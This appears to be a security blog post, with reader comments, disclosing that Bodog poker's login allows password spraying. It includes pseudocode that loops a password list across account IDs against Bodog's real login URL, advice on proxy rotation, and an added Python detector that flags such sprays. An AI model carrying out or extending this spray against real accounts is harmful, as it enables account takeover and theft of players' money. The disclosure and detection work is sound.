Yesterday we posted an article about how Bodog’s anonymous tables weren’t so anonymous after all. We accompanied this with a video showing how this was true:
Bodog’s response was to cover it up rather than address the root problem: the violation of server-client trust. They went on to say:
Your money is and has always been safe at Bodog. If you are concerned about the security of your account, having access to an account number is similar to having a screenname before our latest update.
In a future blog post we’ll talk about how the only secure method of user authentication is the Two-Factor Model, but that’s not the focus today.
As we like to say here at hhSmithy:

Bodog claims that showing a user’s account ID is inherently safe, because a hacker would still need the password to log in. Set aside for a second that this claim implicitly admits they blatantly lied about having anonymous tables; they’re saying their system is secure because an attack on users’ passwords is impossible on Bodog.
Well, maybe it is and maybe it isn’t. According to Gus Fritchie and Mike Wright, Bodog’s software has numerous cross-site scripting (XSS) vulnerabilities and an exposed web API for logging in. (source: Getting F***** on the River, Defcon 19)
When we looked into these problems, many of them still existed. However, we’ll only talk about one method of attack on the web API, since it’s vulnerable to a brute force attempt.
On Bodog’s log-in form, multiple attempts on a given user ID with the incorrect password will lock that ID out. The lockout period is a few minutes, which ensures that a single username can’t be brute forced in a reasonable timeframe. However, the shotgun method works fine, because the lockout is tracked per username: a script that gathers a bunch of usernames from a tool like PartyCrasher (not publicly available, please stop asking) and pairs them with a wordlist of passwords can try every user you’ve found with every password, never hitting the timeout for any given username!
Since they don’t ban by IP, no proxies are necessary, but implementing them isn’t hard either. You can find free lists of proxies, or purchase the rights to thousands more IPs for less than $100/month, and cycle your brute force script through them, perhaps limiting the attack to 200 attempts per proxy.
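The flip side of the shotgun method is what a site operator should be watching for. A per-username lockout counts failures per account, and the pattern above keeps every account under that threshold; proxy rotation capped at a few hundred attempts per IP keeps every source under a per-IP threshold as well. What survives both is the number of distinct accounts that fail in a short window, per source and site-wide. The following Python detector is an added example written for this post, not code from hhSmithy, from the video, or from Bodog; the audit-log format (timestamp, source IP, account ID, result), the thresholds, and the log lines themselves are constructed assumptions.

```python
"""Password-spray detection over a login audit log (added example).

Assumed log format, one event per line:  <ISO timestamp> <source ip> <account id> <OK|FAIL>
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log: one source cycling a single password across many
# accounts, plus a legitimate user who mistypes a password twice and then logs in.
SAMPLE_LOG = """\
2011-11-01T10:00:00 203.0.113.5 4025500 FAIL
2011-11-01T10:00:01 203.0.113.5 1240159 FAIL
2011-11-01T10:00:02 203.0.113.5 8856161 FAIL
2011-11-01T10:00:03 203.0.113.5 5512000 FAIL
2011-11-01T10:00:04 203.0.113.5 7781203 FAIL
2011-11-01T10:00:05 203.0.113.5 9900012 FAIL
2011-11-01T10:00:10 198.51.100.7 3300111 FAIL
2011-11-01T10:00:12 198.51.100.7 3300111 FAIL
2011-11-01T10:00:20 198.51.100.7 3300111 OK
"""


def parse_log(text):
    """Parse the assumed format into (timestamp, ip, account, result) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, account, result = line.split()
        events.append((datetime.fromisoformat(ts), ip, account, result))
    return events


def max_failures_per_account(events):
    """What a per-account lockout sees: the highest failure count on any one
    account. A spray that rotates accounts keeps this number small."""
    counts = defaultdict(int)
    for _, _, account, result in events:
        if result == "FAIL":
            counts[account] += 1
    return max(counts.values(), default=0)


def max_distinct_in_window(pairs, window):
    """pairs: (timestamp, account) tuples. Largest number of distinct accounts
    seen in any sliding window of the given length (two-pointer sweep)."""
    pairs = sorted(pairs)
    best, start = 0, 0
    for end in range(len(pairs)):
        while pairs[end][0] - pairs[start][0] > window:
            start += 1
        best = max(best, len({acct for _, acct in pairs[start:end + 1]}))
    return best


def find_spraying_sources(events, window=timedelta(minutes=5), threshold=5):
    """Per-source signal: {ip: distinct failed accounts} for every source that
    fails against at least `threshold` distinct accounts inside one window."""
    by_ip = defaultdict(list)
    for ts, ip, account, result in events:
        if result == "FAIL":
            by_ip[ip].append((ts, account))
    flagged = {}
    for ip, pairs in by_ip.items():
        n = max_distinct_in_window(pairs, window)
        if n >= threshold:
            flagged[ip] = n
    return flagged


def sitewide_failed_accounts(events, window=timedelta(minutes=5)):
    """Site-wide signal: distinct accounts with a failed login in any window,
    ignoring source. A proxy pool capped at N attempts per IP defeats the
    per-source check above but not this count; compare it against a baseline."""
    fails = [(ts, account) for ts, _, account, result in events if result == "FAIL"]
    return max_distinct_in_window(fails, window)


if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print("max failures on a single account:", max_failures_per_account(ev))
    print("sources spraying many accounts:", find_spraying_sources(ev))
    print("distinct accounts failing site-wide:", sitewide_failed_accounts(ev))
```

On the constructed log no account fails more than twice, so a per-account lockout set at three attempts never fires, while the per-source check flags 203.0.113.5 for six distinct accounts and the site-wide count reaches seven. The threshold values are placeholders; in practice they are set from the site's normal distinct-failure rate per window.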
The video below details the attack with a voiceover explanation:
Here’s the pseudocode shown in the video; it gives a basic outline of how a hacker might start a script to bust various users’ passwords. Remember, Bodog only enforces a six-character minimum password, with no need for mixed case, special characters, numbers, or anything exciting. I’ve made multiple accounts there with the password “password” or “bodogpoker” with no problem. You can be sure that plenty of users have simple passwords, too.
// username and password global lists
username = array('4025500', '1240159', '8856161', ...)
password = array('password', 'bodogpoker', 'badbeats', ...)

// attempts a bodog login with a username and password
function attemptBodogLogin(user, pass)
    failure = 'Required information' // failure string
    response = webFormSubmit('https://www.bodog.eu/account/app/Login',
                             user, pass) // submit a form with user and password
    if (response == failure)
        return FALSE // nope, user and pass pair failed
    else
        return TRUE // hacked!

// tells you if the bodog login succeeds and prints account details
function hackUser(user, pass)
    result = attemptBodogLogin(user, pass)
    if (result == TRUE)
        print 'Broken password! User: ' . user
        print 'Password: ' . pass

// main function that is called first, nested for loop (O(n*m) for nerds)
function main()
    foreach(password as pass) // for every password in the list
        foreach(username as user) // for every username in the list
            hackUser(user, pass) // try a user with the first pass
        endforeach // next user, try the same password
    endforeach // next password, loop through the userlist again
Bodog and other sites like it must subject themselves to independent analysis if they ever want to claim that they’re secure. There are numerous hackers out there doing exactly what we’re doing without disclosing anything. They’re stealing money left and right and using poor software code to write exploitative bots. The only poker site that even comes close to doing a good job is PokerStars, and it’s not even clear that some attacks won’t work there.
The need for independent analysis has never been greater with the possibility of legalization of online poker. It comes hand in hand with regulation. Demand it.
Good stuff. I did some research and presented at Defcon and HackrCon II (http://www.senet-int.com/news1.php) and covered some of these same types of issues, including the ease with which passwords could be broken. In July Bodog did not perform account lockout; nice to see they are at least doing that now. I was just about to look at Bodog’s anonymous tables, as I did not think they would have implemented them correctly, but you beat me to it :) I also have written some articles for Pokerfuse on information security and regulation and think that we are on the same page with the direction the industry needs to move. Feel free to contact me directly if you want to have any future conversation on the subject.
Gus
Gus:
Great to hear from you. We used you as a source in this article, and your talk was outstanding (I’ve suggested it to many people on 2p2).
I’ll be in touch soon; I’d love to pick your brain about a few other exploits.